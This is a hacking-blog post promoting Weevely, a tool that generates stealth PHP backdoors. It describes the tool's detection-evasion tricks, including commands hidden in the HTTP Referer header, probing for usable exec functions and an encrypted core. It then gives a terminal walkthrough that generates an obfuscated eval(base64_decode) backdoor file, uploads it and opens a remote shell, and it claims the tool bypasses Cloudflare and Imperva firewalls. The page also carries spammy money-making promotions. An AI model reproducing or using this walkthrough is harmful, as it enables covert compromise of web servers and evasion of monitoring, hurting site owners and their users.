BLACK BURN HACKER. Powered by Blogger.

Real Money Instantly


Monday, July 16, 2012

Generate and Manage Stealth PHP backdoors


Weevely create and manage PHP trojan designed to be hardly detectable. Is a proof of concept of an unobtrusive PHP backdoor that simulate a complete telnet-like connection, hidden datas in HTTP referers and using a dynamic probe of system-like functions to bypass PHP security restrictions.
With weevely you can generate PHP code to trojanize a web server, this backdoor acts like a telnet client to execute commands or inject addictional function on the backdoored server. Communication between backdoor server and client are done via normal HTTP requests, with a plausible fake HTTP_REFERER header field that contains coded commands to hide traffic from NIDS monitoring and HTTP log files review.
The program trying to bypass PHP configurations that disable sensible functions that execute external programs, enabled with the option disable functions located in php.ini. Weevely tries different system function (system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()) to find out and use functions enabled on remote server. Also the backdoor server code is small and easily hideable in other PHP files, the core is dynamically crypted in order to bypass pattern matching controls.

root@bt:/weevely# ./  -h
  Weevely 0.3 - Generate and manage stealth PHP backdoors.
  Copyright (c) 2011-2012 Weevely Developers
Usage: [options]
  -h, --help            show this help message and exit
  -g, --generate        Generate backdoor crypted code, requires -o and -p .
  -o OUTPUT, --output=OUTPUT
                        Output filename for generated backdoor .
  -c COMMAND, --command=COMMAND
                        Execute a single command and exit, requires -u and -p
  -t, --terminal        Start a terminal-like session, requires -u and -p .
  -C CLUSTER, --cluster=CLUSTER
                        Start in cluster mode reading items from the give
                        file, in the form 'label,url,password' where label is
  -p PASSWORD, --password=PASSWORD
                        Password of the encrypted backdoor .
  -u URL, --url=URL     Remote backdoor URL .
Choose your password and create the backdoor:

root@bt:/weevely# ./ -g -p coco -o door.php
  Weevely 0.3 - Generate and manage stealth PHP backdoors.
  Copyright (c) 2011-2012 Weevely Developers
+ Backdoor file 'door.php' created with password 'coco'.
root@bt:/weevely# ls -al door.php
-rw-r--r-- 1 root root 321 2011-10-06 00:20 door.php
root@bt:/weevely# cat door.php
<?php eval(base64_decode('aW5pX3NldCgnZXJyb3JfbG9nJywgJy9kZXYvbnVsbCcpO3Bh
hvICc8L2NvPic7fQ==')); ?>
Upload the backdoor to your customer’s web server and try to access it:

root@bt:/weevely# ./ -t -u -p coco
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .
[www@server /var/www] id
uid=69(www) gid=69(www) groups=69(www)
[www@server /var/www] pwd
Furthermore, i tried to test weevely on servers that are protected from web application firewalls (specifically by Cloudflare and Imperva) and worked fine.

©2012, copyright BLACK BURN


Post a Comment


7 Years Earning Experience

The Earning Source You Can Trust

Follow by Email